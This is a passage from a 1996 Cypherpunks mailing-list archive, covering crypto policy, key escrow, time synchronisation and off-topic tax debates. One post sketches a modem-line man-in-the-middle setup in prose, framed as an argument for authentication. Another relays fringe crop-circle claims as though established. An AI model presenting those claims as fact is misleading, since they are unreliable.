If you don't have a Web or FTP server of your own, I'd be happy to host
it, without comment, and with your PGP signature of course so that no
meanies can mess with your prose. I could even put it on a server with no 
obvious ties to me.

Surely you would like people to know the way Jim Bell thinks.

Let me know...

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQm7E43DXUbM57SdAQE2ZgP9Ep4iFICIs6P1WByOSAjaByCF40kvSgY7
Xg9wz634oKhm3POqxxWc9Fzy3WG4kh5BRGG3VTnxkazwOzfq1YU4KEBOVGaUO+OF
6tJxAtV4yG93psCUaL0YuWw8oKYOmZgno3mc7chi7np+PU4mh36isypvUNwTiJNN
32TwpY5kLBk=
=2pY/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 27 Jan 1996 14:12:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <199601270550.VAA23195@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


For those allergic to Microsoft word, I have htmlized the crypto api

You can find it at

http://www.jim.com/jamesd/mscryptoapi.html


I hope that microsoft will soon have an official html version.

A notable misfeature of the API is that it assumes that in general 
you will have two key pairs.  One for signing and one for encrypting.

Since in the most common case you are encrypting something related to a
signed message by the person you are encrypting to this is a
bad idea, and protocols that require two key pairs to avoid protocol
failure are hazardous and inconvenient.  I think Microsoft should 
not have chosen to support such protocols.

The Crypto engine that Microsoft will soon distribute in every copy of
NT and windows will of course be crippled -- 512 bit RSA keys and
40 bit RC4 keys, but of course we should not do anything about this 
until we have some crypto enable applications floating around.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 27 Jan 1996 11:29:08 +0800
To: cypherpunks@toad.com
Subject: An Enigma - Wrapped In a Circle
Message-ID: <199601270257.VAA40304@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the January/February 1996 Mensa Bulletin on pages 9-10 is an
article by Teresa Fisher titled "An Enigma Wrapped In a Circle."

The article is about a phenomenon which has interested me for quite
some time, "crop circles" or "pictograms." I have tried to find
this excellent article on the web and failed, so I will quote a few
parts of it I consider relevant. All typos are mine, Ms. Fisher is
an excellent writer, and I have changed her well done presentation
only for brevity and clarity. If you think that this post has "no
cypherpunk relevance" you can:
1. Flame me, in *private* e-mail. [I'll happily ignore you.]
2. Go hump a tree.

Article excerpts (in quotes) and my comments follow:

"In the late 1970s, farmers over the world were finding unexplainable,
perfectly round, flattened areas in their grain fields. The flattened
crops made irreproducible, layered swirl patterns. As time went on
and crop circle incidents increased tremendously, the outlines of the
formations became more complex and came to be called pictograms."

They appeared overnight, "[by 1990] some 2000 circles and pictograms
had been formed all over the world. A large percentage...were showing
up in a small area in southern England, mainly in Wiltshire Downs."

"Then, in 1991, two retired Englishmen named Doug Bower and Dave
Chorley announced that they had been responsible for the crop circle
phenomenon for the past 13 years." The dim media swallowed this hook,
line, and sinker; neglecting to question "how they created intricate,
sometimes braided swirls, executed elaborate pictograms in the dark,
and caused crop formations in 19 other countries besides England."
Brittle plants in the (non-hoaxed) circles were also bent in a way
"that no investigator has been able to duplicate."

Recent tests, including some at the Oak Ridge National Laboratories,
show isotope changes in the soil, and differing biophysical and
biochemical properties of the grain within the pictograms when
compared to adjacent grain in the field.

Gerald Hawkins was not fooled. He did "a systematic study of the
geometry of the circles, and found ratios of small whole numbers
that precisely matched the ratios defining the diatonic scale.
Further statistical analysis revealed three other geometric theorems
in the circle patterns, and he realized that all four theorems had
a common thread that led to a fifth, more general theorem. His
inability to find any of these theorems in Euclidean geometry or
any of the math books he consulted caused him to conclude that
whoever is making the circles had to not only know how to prove a
Euclidean theorem, but also to conceive of an original theorem.
Hawkins says that proving a theorem is easy; conceiving it in the
first place is quite another matter."
["FN 6 Ivars Peterson, "Euclid's Crop Circles," *Science News* 141,
No. 5, pp. 76-77."]

In late 1991 in Ickleton "a perfect depiction of the mathematical
configuration known as the Mandelbrot Set" appeared.
["FN 9 Beth Davis, *Ciphers in the Crops,* (Bath, England:
Gateway Books, 1992)pp. 9-15."]

I am now experiencing Tim's wish that I could draw in e-mail, as
there is a diagram here of "a circle inside a triangle inside a 
ring inside a hexagon inside a ring." Don't even *try* to imagine
it. The article points out that "NASA will be promoting the space
program with a crop circle image and the slogan, 'We need to be
out there.'" [Agreed, but with *tax* money?] Back to Ms. Fisher.

"I have been amazed at the need many people have to dismiss this
mystery. They will ignore all of the evidence to claim that the
circles are being formed by weather or hoaxers. Neither claim
stands up to even minimal scrutiny. I don't know what is causing
crop circles to appear, but I'm certain it isn't being done by
the wind or by an old man with a board. What do you think?"

I must add that anyone who has seen the cover of Robert Plant's
"Now and Zen" album would have trouble believing that a couple
of drunks from the pub down the street did _THAT_! I do not
know if "extraterrestrials" or "UFOs" are responsible for these
images. [In my long-held opinion, governments tend to lie about
UFOs (surprise!).] I do feel that these pictograms, these "Ciphers
in the Crops," cry out for cryptanalysis, by someone far more
adept at complex mathematics than I am. Results might well be felt
worldwide. Thoughts?
JMR

Regards, Jim Ray  --  Boycott espionage-enabled software!

 "He that would make his own liberty secure, must guard even
  his enemy from oppression; for if he violates this duty, he
  establishes a precedent that will reach to himself." - T. Paine
            http://www.shopmiami.com/prs/jimray
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMQmUiG1lp8bpvW01AQE+OwP/URevvKxeTnV75DfXm0+XM9JTWR9w2ZCn
9RbdwBmVK5WTw5228x2EBNrhAQeGeksFQX9z/YEZgLCbscX1vtAT1PydSf2JBruM
jOBhRX/a4MJWo4l7UcyefQwK2NyB8YXwqGoDPQKYtC9dqY0X6wuDnRWP2SGVYkG4
pf28zVDk1Vc=
=MxuH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jan 1996 14:28:39 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <199601270558.VAA04133@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:49 PM 1/26/96 -0800, Rich Graves wrote:
>Outlaw cryptography, and only cryptographers and outlaws will have 
>cryptography.

However unlike guns which require some level of machine shop to produce,
cryptographic systems can be produced at home by a smart high school
student with only the computer that is needed to compete in the the modern
economy.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 27 Jan 1996 11:56:16 +0800
To: cypherpunks@toad.com
Subject: Denning's misleading statements
Message-ID: <Pine.SUN.3.91.960126222026.8591A-100000@reggae.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



I think the big bait-and-switch is her description of the various 
companies falling over themselves to get to _VOLUNTARY_ key escrow to 
avoid losing data and protecting themselves against employee problems 
versus _MANDATORY_GOVERNMENT_ key escrow to ensure that individuals 
cannot hide information from the government.

Key escrow is good.  Key escrow against your will is bad.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 27 Jan 1996 12:26:06 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Time codes for PCs (fromn German Banking)
In-Reply-To: <m0tfyb0-00090XC@pacifier.com>
Message-ID: <9601270353.AA07828@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Jim Bell wrote:

> At 11:11 PM 1/24/96 -0500, Dave Emery wrote:
> >> 
> >> Was the person in the basement eavesdroping or actuall performing a
> >> man-in-the-middle attack?
> >> 
> >	Very much the easiest way of doing this is a classic man in the
> >middle attack with two vanilla off the shelf modems and a vanilla off
> >the shelf central office simulator.  The modems would be  tied more or
> >less back to back through two serial ports and software on a laptop in
> >the basement, one modem connected to the actual phone line to the central
> >office and the other connected to the local wires to the targets home
> >through the central office simulator.  This way all traffic in both
> >directions would go through the modems and software on the laptop
> >allowing the connection to be taken over cleanly between packets, and
> >packets to be injected and deleted as needed.  I beleive that it would
> >not be hard to make such a MITM decode the DTMF dialing from the target 
> >and dial the same number on its outgoing modem thus enabling the
> >MITM to passively relay modem calls it wasn't interested in spoofing.
> >And incoming modem calls could be similarly handled.
> 
> A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
> broadcast to the millisecond/microsecond/nanosecond, available from sources 
> as varied as TV VIR's, FM subcarriers, and other sources, available as an 
> easy input (via a peripheral card) to a computer.

	Unfortunately even if the special software, delay checking protocols 
and accurate time distribution to suppport this was widely distributed
around the net (which is a huge if) this would not do much against the
kind of MITM I've hypothesized in many real world modem situations.   The
propagation delay of the telephone network (particularly inter-LATA long
distance) can vary considerably as calls can be routed via all sorts of
paths including some involving large detours - the delay through the
MITM would certainly be detectable but not necessarily obvious compared
to the variability in telco network timing (and circuit quality) from
call to call.

 	Also the delay through modems is quite variable depending on who
wrote the firmware (eg the modem brands on both ends of the link), what
speed and signalling parameters the modem has negotiated, whether or not
compression is enabled (and how compressable the data is) and what
parameters for it are selected, and how good the line is. The last is
very important, on a poor line with ARQ error control enabled LAPM
packets may be retransmitted more than once adding intermittant longer
delays and from time to time retraining may occur adding even longer
delays.

	This would make establishing alarm limits for delay that
would trip on the hypothetical MITM reliably and not go off on random
variations from connection to connection very difficult.

	And one does not need accurate time of day to measure link
propagation times - if one is running TCP/IP or most varients of it
there is a built in low level echo function (the ICMP echo, used by the
unix ping command and traceroute) that allows one to send a packet and
get back an (usually) immediate echo from each router in the path and
the path endpoint.  If one is running plain VT100 type in, the character
echoing is usually done promptly by the host and echo delays can be
measured as one types  and gets back characters.

	Worst case is running some sort of vanilla ASCII text (VT100) 
or proprietary binary protocol via a dial in X.25 or similar PAD (such
as provided by Compuserve, Prodigy and Netcom for most of their
dial-ins).  Here most or all echoing is via the providers network from a
distant host and may be both long delayed  compared to MITM delays and
quite variable due to network loading.

	There is some glimmer of hope, however with current crop of V.34
(28.8kb)  modems, most of them have commands to report the link analog
characteristics and one of the standard reported items is the delay to
the far end modem. If this is almost 0 ms for a call to the other coast
one can and should get very suspicous.   Unfortunately, a more
sophisticated MITM  that would defeat this check than the one I
hypothesized could be built using a vanilla stereo sound card to add
appropriate delay by digitizing the line signal and delaying it in
memory before spitting it out the other channel to the local listening
modem.

	Perhaps the best defense for the paranoid is to make sure that
all the obscure low speed modes, voice calls on the line,  and things
like fax tranmission work reliably and as they should - but even this
can be defeated with a slight increase in MITM sophistication, and in
any case this kind of MITM is presumably targeted at hit and run attacks
on the unsophisticated who would presumably not know how to check for
this stuff. 

	All of this just emphasizes the need for strong message
authentication best done with crypto technology, and for secure end to
end encryption of virtual circuits used by many common  character by
character (such as telnet and VT-100 connections)  or packet by packet
transactions that use authentication only done up front (avoiding the
hijacking problem where the link is authenticated by something at the
beginning of the session such as a password or challenge/response
protocol and then taken over (perhaps only momentarily) by an intruder).
 
> 
> I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
> and had the foresight to install it with its computer  interface option. 
> (receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
> containing "exact" time.) 

	I have some more comments on time I'll send you in email as they
are (worse) noise to the list....

						Dave Emery 
						die@die.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Townsend <townsend@smokin.fly.net>
Date: Sat, 27 Jan 1996 12:56:13 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: [MORE IRRELEVANCE] Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SV4.3.91.960126211149.24886C-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.91.960126222944.12401B-100000@smokin.fly.net>
MIME-Version: 1.0
Content-Type: text/plain



Gawd, I hoped this would die but I just have to get a dog in on
this now....please excuse

On Fri, 26 Jan 1996, Alan Horowitz wrote:

> 
> > In fact, before FDR, wage income was taxed; however, it was one large 
> > check at the end of the yeraar (or the beginning of the next, really).
> 
>   I think this wrong. Read the definition of "income" before the WWII. 
> Wages were considered to be an equal exchange for labor services 
> rendered, not a "gain" (income).

Sixteenth Amnendment, ratified 1913.  I believe it was introduced
as the Simmons Tarriff?   1% on incomes over a few k, incremental
to 7% for something like 500k.  One big check.  And income meant 
the same thing it does now, you know, the numbers without the 
minus signs:

Funk & Wagnalls, 1913  (sorry, no URL)

1. The amount of money coming to a person or corporation within a 
specified time or regularly (when unqualified, annually), whether
as payment for services, interest, or profit from investment;
revenue.

Webster's 2nd International, 1954 (still no URL, not for the 2nd...)
4. That gain or recurrent benefit (usually measured in money) which
proceeds from labor, business, or property; commercial revenue or
receipts of any kind....

Now, granted, Funk & Wagnalls went to press before there was such
a thing as an income tax...so it's possible that for thirty two
years income meant something different, and reverted....

> 
> > The high cost of WW II made it a necessity for the gvm't to have more 
> > money at a particular moment, and not wait for year-end.
> 
>     Not so. Govt has been able to print fiat money at will since the Fed 
> Reserve was founded in 1913.

Actually, no, they could print fiat money whenever they damn well
pleased, same as ever.  Reserve notes were originally 60/40 third 
party (paper) loans to federal gold.  True, all of a sudden it 
was Uncle Sam's name on the notes, but it wasn't just ink.

>      Technically, the income tax is an excise, not a tax. They aren't the 
> same.
> 

!!!??  Aren't they?  Maybe a little bit of squares-rectangles business,
but, if so, all excises are taxes....

Websters:
ex'cise
2. An inland duty or impost levied upon the manufacture, sale, or 
consumption of commodities within the country. [...] In the United
States the usual <i>excise</i> is a tax on the inland manufacture, sale,
or consumption of commodities or for licenses to follow certain
occupations, and these taxes are usually called <i>internal
revenue taxes</i>

wheee,

cpt
townsend@fly.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stephen_albert@alpha.c2.org (Stephen Albert)
Date: Sat, 27 Jan 1996 16:16:57 +0800
To: cypherpunks@toad.com
Subject: Re: Open NNTP servers and logging
Message-ID: <199601270745.XAA02132@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:33 AM 1/27/96 +0000, mianignad@outlook.net wrote:

>Well, as bad as the lack of anonymity may be, NNTP server logs serve a very 
>usefull purpose, ie finding and eliminating trolls and spammers.
>Unfortunatly, I would have to go logs given the state of UseNet.

I wish that didn't make so much sense to me.  I can certainly see things from th
sysadmin's point of view.

>Why not just read from the open server, and post anonyomously using anonymous 
>remailers and News-to-Mail Gateways?

That's exactly what I'm doing for the moment.  After my current job starts payin
I'll shop around services like C2 and see who has a faster news feed than my 
current ISP.  Things take way too long to get here sometime.

By the way, plug plug plug, I wrote up a short set of instructions on posting 
through gateways with Private Idaho and put it on alt.security.pgp.  An Alta 
Vista or Deja News search would turn it up.  I can also mail it out to anyone wh
would like a helping hand with it.

Stephen "all the news that fits we print" Albert
stephen_albert@alpha.c2.org <*> PGP key on request and on servers



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQnPWkimCtQtWVIdAQHb0Af9Gu061sLCpF9IXmyhhjhYMQMOf2yS7jbc
7fC9Q+SsxwRCq3N9PKcY/3We73HB4p4Ksu+PHa0s6AsTZcrWpm372G+XEyRXxs4k
MXxJHM21eqawy4SoQL8wccpgfRl0AHGyfhDJMiYPVMgUejugXo6npWh/13am2tA2
H+qQc/8f9YPcMa12k00WkH/fzfnldO+5A/p0OGxhip+ELwQR03UX3OJQuIAPJB91
qJQI90eu64yeE/MRCY4nNiQX3tX3+r5CtZFoYNQ2TSXPZlgvIzojcT8hyIteUbrd
L/Ocfg7qRQP6P9iAVjq8xFhNjVAFvODvnEH07mNw4nq4YjdQ2i5f8g==
=HvDS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jan 1996 17:01:10 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: "Gentlemen do not read each other's bank statements"
Message-ID: <199601270825.AAA05579@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > The high cost of WW II made it a necessity for the gvm't to have more 
>> > money at a particular moment, and not wait for year-end.
>>     Not so. Govt has been able to print fiat money at will since the Fed 
>> Reserve was founded in 1913.

The phrase "not worth a Continental" dates to several wars before that,
and several governments of East-coast North America as well.

tenuous-at-best connection to cypherpunks material - using a currency
backed only by the supply of ones and zeroes requires a market mechanism
to encourage the issuers not to overdo it....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jan 1996 17:01:32 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <199601270825.AAA05590@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 PM 1/26/96 -0600, Alex Strasheim <cp@proust.suba.com> wrote:

>Why aren't foreign companies flooding America with strong crypto?  Well, 
>there are clearly pressures of the sort Tim described at work.  But there 
>are other factors as well:
.....
Among other things, the RSA and other public-key patents in the US,
combined with non-exportability, severely limit the ability of non-US
companies to sell public-key-based software in the US.  Banks often use
moderately-strong crypto (single-DES), and there are some imported 
cash machines which support it, but it's not a big market.  
Other than that, most people don't care much about crypto, and assume that
the password-"protection" that Microsoft products offer is enough for them.

>Digicash is probably the first significant crypto product to be exported
>to America.  

IDEA's pretty significant, though PGP 2.x could have used triple-DES
if IDEA hadn't been available.  The political significance of it being
foreign, or at least non-NSA-tainted, has been somewhat important as well.
Then you could also contend that Shamir, a significant crypto producer,
exported himself to America :-) (I think he's the RSA member who's Israeli?)
(You could also contend that Enigma and Purple were exported to America,
and in Enigma's case, the ability to crack it was mainly Polish and British.)

Digicash is highly significant as an idea, but will only be significant
in reality if they can pull off a successful business strategy
before the market gets saturated with less private solutions that
everyone needs to be backwards-compatible with.

>It's important to note that this extremely important product couldn't
>have been produced here, patents aside.  
>Transaction systems need to be international, and our rules make
> America an unsuitable place from which to launch tranaction software.

Nicely put; I'll have to steal it sometime :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jan 1996 17:18:10 +0800
To: cypherpunks@toad.com
Subject: Hey, jdoe-agamemnon!   Re: NOISE  Test Ignore
Message-ID: <199601270836.AAA05981@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:00 PM 1/26/96 -0800, MAILER-DAEMON@alpha.c2.org wrote:
>Unknown addressee: jdoe-agamemnon@alpha.c2.org
>
>----- Unsent Message Follows -----
>
>Received: by alpha.c2.org for jdoe-agamemnon@alpha.c2.org
> From stewarts@ix.netcom.com  Fri Jan 26 20:12:47 1996
>Received: from ix2.ix.netcom.com (ix2.ix.netcom.com [199.182.120.1]) by
infinity.c2.org (8.7.1/8.6.9) with SMTP
>	id UAA06971 for <jdoe-agamemnon@alpha.c2.org>; Fri, 26 Jan 1996 20:12:47
-0800 (PST)
>	Community ConneXion: Privacy & Community: <URL:http://www.c2.org>
>Received: from pax-ca11-09.ix.netcom.com by ix2.ix.netcom.com
(8.6.12/SMI-4.1/Netcom)
>	id UAA19713; Fri, 26 Jan 1996 20:17:46 -0800
>Message-Id: <199601270417.UAA19713@ix2.ix.netcom.com>
>X-Sender: stewarts@popd.ix.netcom.com (Unverified)
>X-Mailer: Windows Eudora Light Version 1.5.2
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Date: Fri, 26 Jan 1996 20:17:45 -0800
>To: jdoe-agamemnon@alpha.c2.org
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: NOISE  Test Ignore
>
>At 09:22 PM 1/25/96 -0800, you wrote:
>>Test  Test  Test
>>
>>
>Well, it got here, jd...
>#--
>#				Thanks;  Bill
># Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
>#
># "Eternal vigilance is the price of liberty" used to mean us watching
># the government, not the other way around....
>
>
>
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jan 1996 17:22:44 +0800
To: cypherpunks@toad.com
Subject: Hey, jdoe-agamemnon  Re: NOISE  Test Ignore
Message-ID: <199601270836.AAA05989@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:00 PM 1/26/96 -0800, MAILER-DAEMON@alpha.c2.org wrote:
>Unknown addressee: jdoe-agamemnon@alpha.c2.org
>
>----- Unsent Message Follows -----
>
>Received: by alpha.c2.org for jdoe-agamemnon@alpha.c2.org
> From stewarts@ix.netcom.com  Fri Jan 26 20:12:47 1996
>Received: from ix2.ix.netcom.com (ix2.ix.netcom.com [199.182.120.1]) by
infinity.c2.org (8.7.1/8.6.9) with SMTP
>	id UAA06971 for <jdoe-agamemnon@alpha.c2.org>; Fri, 26 Jan 1996 20:12:47
-0800 (PST)
>	Community ConneXion: Privacy & Community: <URL:http://www.c2.org>
>Received: from pax-ca11-09.ix.netcom.com by ix2.ix.netcom.com
(8.6.12/SMI-4.1/Netcom)
>	id UAA19713; Fri, 26 Jan 1996 20:17:46 -0800
>Message-Id: <199601270417.UAA19713@ix2.ix.netcom.com>
>X-Sender: stewarts@popd.ix.netcom.com (Unverified)
>X-Mailer: Windows Eudora Light Version 1.5.2
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Date: Fri, 26 Jan 1996 20:17:45 -0800
>To: jdoe-agamemnon@alpha.c2.org
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject:   
>
>At 09:22 PM 1/25/96 -0800, you wrote:
>>Test  Test  Test
>>
>>
>Well, it got here, jd...
>#--
>#				Thanks;  Bill
># Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
>#
># "Eternal vigilance is the price of liberty" used to mean us watching
># the government, not the other way around....
>
>
>
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Sat, 27 Jan 1996 14:15:22 +0800
To: jimbell@pacifier.com (jim bell)
Subject: NOISE NOISE NOISE - clocks and other irrelevance
In-Reply-To: <m0tfyb0-00090XC@pacifier.com>
Message-ID: <9601270540.AA10607@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
> broadcast to the millisecond/microsecond/nanosecond, available from sources 
> as varied as TV VIR's, FM subcarriers, and other sources, available as an 
> easy input (via a peripheral card) to a computer.

	The only technology that I'd trust to be useful much below
10-100 ms is GPS.   The others are unlikely to be controlled well enough
at the source to be trusted.  Current TV broadcasting, for example,
usually involves multiple passes though digital frame stores and time
base correctors  - most homes get the signal via cable which itself
involves significant uncontrolled delays  (juat the thermal changes
in propagation delay  in a long CATV cable and amplifier chain due to weather
changes run into the many microseconds).

	And humans beings being as imperfect as they are, it is hard to
beleive that making sure that the time being broadcast is really kept accurate
is going to be a priority when most people use it for purposes that require
plus or minus a few seconds timing.

> 
> I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
> and had the foresight to install it with its computer  interface option. 
> (receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
> containing "exact" time.) 
> 
> While I've never taken the time to connect it to my PC, it provides 
> (through an RS232 jack) correct time with a rated accuracy of about 5 
> milliseconds, as I vaguely recall. (Even has a dipswitch setup on the bottom 
> to tell it how many 500 mile increments you are away from WWVB... corrects 
> for delay to a first order of magnitude.)
> 
	WWVB is the 60 khz broadcast (which is more accurate due to more
stable propagation) . the  HF ones are WWV.  Commercial time receivers
are available that work off the 60 khz time code (very narrow bandwidth
ASK), but the 60 khz is most used as a standard frequency for long
term tracking of error in local standards.

> (BTW, if anybody knows how to easily connect it to the pc, or has the 
> appropriate software, please tell me  The task isn't difficult from a 
> hardware standpoint; it's just RS-232 serial ASCII timecode at about 9600
> bps which 
> either continuously retransmits or on request.  The problem is the software:

	If you run unix there are some quite sophisticated programs that
can use this specific clock (connected to a serial port) that allow sync
to the full accuracy possible at good times of day (around 1 ms).   The
programs also allow time distribution to other computers on a network -
thus their name  - ntp - which stands for network time protocol (and the
network time program that implements it). This protocol and the various unix
programs that implement it are quite widely used on commercial LANs and
the Internet to sychronize time amoung unix workstations, servers, and
bridges and routers.  Current implementations are capable of tracking
clock oscillator error on a system and adjusting the time periodically
to compensate for the frequency error of the clock and even to predict
(polynomial approximation) the change in frequency error with time.

	The man behind much of this (at least the early research) is
Dave Mills who used to be at louie.udel.edu which hosted a ftp
site for the programs.   An archie search will reveal where they
are kept now, and there is a newsgroup (comp.protocols.time.ntp) for this
which no doubt has a substantial faq file about this. 

	
>  How, exactly, do I INTERFACE such a serial input to the existing computer/RTC 
> combination? (Don't tell me to plug it into an unused serial jack!  I'm not 
> stupid. I'm not a  programmer, and I don't play one on TV! (I know 
> gates, flops, op amps, A/D, D/A, microprocessor hardware design, even some 
> Z-80 assy language, RF,  and I've programmed in Fortran, Basic, APL, Algol, 
> PL/1, Pascal, LISP, but not recently and I don't enjoy it!)
> 
> 

	I suspect that by this point there are several windoze/DOS  programs
to sync a PC to ntp time on a network, and perhaps even a program that will 
accept input from a Heath clock ... although the initial ntp code was
written for unix on Suns.
\

> (Then again, there are those "Receptor" watches which have (at least) similar 
> accuracy, which as I understand it work on FM subcarrier principles.)

	Yes they use the RDS broadcast on the 57 khz subcarrier for this.
Of course there is no certainty the station has the clock set accurately.
> 
> 
> Technology has now supplanted this old monstrosity:  Even with CHEAP GPS 
> receivers, they put out time which is rated in accuracy to well better than 
> 1 microsecond, and probably better than 200 nanoseconds even with S/A turned 
> on, and probably 100 nanoseconds with S/A off.  Once GPS receivers contain 
> equally cheap DGPS receivers, they'll be able to tell you your location to 
> about 1 meter and corresponding time accuracy, about 3 nanoseconds.
> 
	Yup.   And ntp can use several cheap gps products available to sync
a unix clock to high accuracy.

> I'm not particularly familiar with TV VIR signals, but I'd imagine they are 
> timecoded, or at least they COULD be without a lot of effort.  Resolution 
> would be FAR better than 1 microsecond, and accuracy would be primarily 
> limited by knowledge of your location compared to the xmitter.
> 
	Could be is the operative word here,  Many tv program
distribution signals carry frame time codes in the VIT, but who put them
there, how accurately they reflect local time  and where in the delay
chain (before or after the satellite for example) they get inserted is
not well controlled.   Nor is there a standard for the format that
addresses the needs of end users rather than broadcast production, or
any particular effort to ensure that a signal is reliably present in the
over the air transmission.

	Once many years ago (seventies)  the NBS (not NIST yet) tried to
get the TV networks to clock themselves with high accuracy rubidium
standards as a means of distributing standard frequency and time. But
technology has made this meaningless as most tv signals are now
distributed via satellites that move around several kilometers in a day
and clocked into multiple layers of frame stores (often delayed more
than a second)  in digital switching and processing gear and clocked out
with different clocks that often are not very accurate and not in any
way locked to the incoming network.

	TV stations could be made to maintain a local clock sync'd to
GPS and use that to do the final level of clocking out before feeding
the transmitter and could thus ensure that some reference point in some
frame happened at an exact time, but given that a user who can see a TV
signal can probably see GPS signals and can do the same timekeeping himself
for a couple hundred bucks it hardly seems worth it any more.  I do
expect that time codes with modest accuracy (few tens of ms at best)
will become common as part of the Starsite (or whatever they call it
now) program guide distribution on PBS, simply because this has defined
a format that can conveniantly contain time messages multiplexed with
other data and the box displays the time.  DSS and VC-II both also have
this capability, but of course the uncertainty of the satellite delay
limits accuracy and neither has provisions for providing time to other
devices.


> MITM attacks would be far more difficult if both ends of the data 
> conversation agreed on the "exact" time, and could detect transmission 
> delays and CHANGES in transmission delays.  While it would be possible to 
> locally spoof the accurate timecode, a cheap version of a "disciplined 
> oscillator" (which any GPS receiver is going to have, anyway) would detect 
> such short-term spoofing trivially.
> 

	See my public comments on this.



> Occasionally, I've speculated on whether it might be useful to be able to 
> synchronize (or, at least, KNOW) to the PHASE of the 60 Hz power grid.  
> True, I know that the HV grid is 3-phase and most people won't know which 
> phase they're on anyway, but that wouldn't change (at least not frequently!) 
> , and I would imagine that 
> it might be  useful.  You wouldn't necessarily know which CYCLE you're on, 
> either, but again that might be compensated for somehow.  If  your computer 
> were talking, locally, to another computer at 4100 baud (? whatever) (7 bits 
> per symbol(?); equals 28.8kbps) you could "easily" agree on a particular cycle 
> relationship, which is going to be essentially constant over a distance of a 
> few tens or even hundreds of miles.
> 
	This is possible, but I bet the variations in phase in the local
